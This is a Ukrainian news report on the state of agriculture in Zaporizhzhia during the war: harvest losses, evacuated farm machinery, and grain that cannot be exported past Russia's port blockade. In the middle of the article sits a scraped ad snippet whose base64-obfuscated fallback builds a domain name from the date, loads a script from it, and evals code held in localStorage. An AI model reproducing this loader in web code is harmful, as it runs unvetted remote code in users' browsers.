«Якщо ми не вивеземо зерно за кордон, воно пропаде»: стан агропромисловості на Запоріжжі під час війни (ФОТОРЕПОРТАЖ)

Сьогодні, 1 червня, відбулася виїзна нарада голови Запорізької обласної військової адміністраціїї Олександра Старуха та в.о. голови департаменту АПК Миколи Вініченка щодо стану справ у агропромисловій галузі під час війни.

Візит відбувся на агрофірму «Славутич», фахівці якої у цей час виконували польові роботи. Директор підприємства Геннадій Марич розповів журналістам та керівництву області про те, як евакуював працівників, продукцію та техніку з зони бойових дій та про актуальні складнощі з реалізацією зерна.

Голова ЗОВА Олександр Старух зазначив, що робота агропромислових підприємств зараз особливо важлива, адже від цього у тому числі залежать успіхи на фронті.

«Продовольча безпека наразі — дуже важлива проблема. Хоча сьогодні перше червня, але зима не за горами. І мають бути зроблені всі дії, щоб ми з вами увійшли в зиму теж спокійно» — говорить голова ЗОВА Олександр Старух.

Зараз, через тимчасову окупацію частини Запорізької области багато аграріїв несуть великі збитки: їх врожай крадуть, а багато складів з зерном пошкоджено. Точна суму збитків зараз не називають, адже ситуація змінюється щоденно. Голова ЗОВА закликає підприємців повідомляти про злочини окупантів до правоохоронних органів.

«Наразі всі господарюючі суб’єкти подають інформацію про збитки, які є. Хочу зауважити, що це робити треба обо’язково, щоб ми мали можливість потім з країни-окупанта, з арештованих міжнародних активів це компенсувати кожному громадянину України, кожному фермеру, кожному госпордарству» — зауважив голова ЗОВА.

Олександр Старух

Функція України у світі — створення стратегічного продовольчого запасу, говорить Олександр Старух. 400 мільйонів людей у світі, в бідних країнах, особливо Північної Африки, Близького Сходу, харчувалися за рахунок українського зерна. Зараз постачання неможливе через блокування портів Росією.

«ОНН викупала 40-50 мільйонів тон зерна кожного року, і за рахунок цього 400 мільйонів людей їли. Сьогодні це зерно має всі шанси туди не потрапити…

…Іншого джерела, звідки поставляти зерно, немає. Китай та Індія закрили ринок рису, в Америці на чотири тижні зсунувся сезон через дощі. Інших шляхів немає, робота кожного фермера — це надважливе питання продовольчої безпеки світу!» — нагадує голова області.

Чи вистачить хліба Запорізькій області

Запорізька область споживає 200-250 тисяч тон хліба. Навіть ті території, які сьогодні продовожуть працювати, можуть забезпечити цей обсяг.

«Запаси хліба у нас достатні. У нас навіть є зарезервовано протягом березня-квітня багато хліба. Достатньо хліба, щоб область прожила до зими. Далі зберуть врожай. У нас проблема в іншому — вивезти, щоб продати» — запевняє голова ЗОВА.

Евакуація підприємства та нові виклики

Геннадій Марич керує агропромисловими підприємствами «Славутич» та «Агротех». Останнє знаходиться у Пологівському районі та Оріхові зокрема. Таким чином підприємець не має змоги обробити 7 з 18 тисяч гектарів своєї землі. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

«Ми посіяли озимі культури, а ярові вже не сіяли. Те, що посіяли з озимих культур, пропаде, тому що усі поля або заміновано, або пошкоджено.» — говорить Геннадій Марич.

Геннадій Марич

З міста Оріхова зараз вивозиться вся техніка та співробітники підриємства «Агротех», у безпеці вже блико 50 тракторів та автомобілів. 50% техніки пошкоджено, її ремонтують вже на більш безпечній території. Також вивозиться продукція, вже близько 4-5 тисяч тон, але існує проблема з її реалізацією. Також у Запорізький район евакуюють завод з вироблення сільгосптехніки.

Близько 100 з 400 співробітників, які перебували на Оріхівщині, отримали новий притулок у Запорізькому районі. Їм знайшли житло для оренди або підселили до інших людей. Багато співробітників евакуювалися до інших міст.

«Склади зараз у мене розбомблені. Продукція лежить під відкритим небом та псується і фактично втрачає свій товарний вигляд. Є ще 2-3 тисячі тон пшениці другого класу, яка, здавалося б, дуже потрібна для нас, але її реалізовати ми не можемо, тому що мукомельні підприємства не беруть, вони завантажені на 3-4 місяці вперед. Жито ми також не реалізуємо, тому що нікому воно не потрібно. У нас достатньо у країні цієї продукції. Якщо ми не вивеземо її за кордон, вона тут пропаде». — бідкається підприємець. Він навіть готовий безкоштовно віддати продукцію, яка знаходиться на складах, аби звільнити місце для майбутнього врожаю.

Геннадій Марич зауважив, що ситуація у фермерів, у яких немає складських приміщень, ще складніша. Зерно нового урожаю потрібно скосити і відразу реалізувати, що наразі неможливо через агресію Росії та блокаду портів.

«А в Україні це зерно не потрібно, тому що запасів 2021 року достатньо для того, щоб, здається, прогодувати країну і у 2022 році.» — повідомив аграрій.

Вихід один, вважає підприємець, — розблокувати порти. Залізничним транспортом вивезти продукцію нереально, його можливостей не вистачає навіть на транспортування минулорічного врожаю.

Тим не менш, на підприємстві «Славутич» вистачає пального і воно продовжує роботу, реалізуючи продукцію вдвічі дешевше. Зарплати співробітники отримують вчасно, зазнає Марич.

Сьогодні підприємство обробляло землю гербіцидами. Співробітники «Славутича» очікують на гарний врожай та продовжують виконувати свою роботу. До них доєдналися деякі евакуйовані фахівці з Оріхова.

Аграрії зізнаються, зараз усі їхні думки про події на фронті. (adsbygoogle = window.adsbygoogle || []).push({});

Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/yakshho-mi-ne-vivezemo-zerno-za-kordon-vono-propade-stan-agropromislovosti-na-zaporizhzhi-pid-chas-vijni-fotoreportazh/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top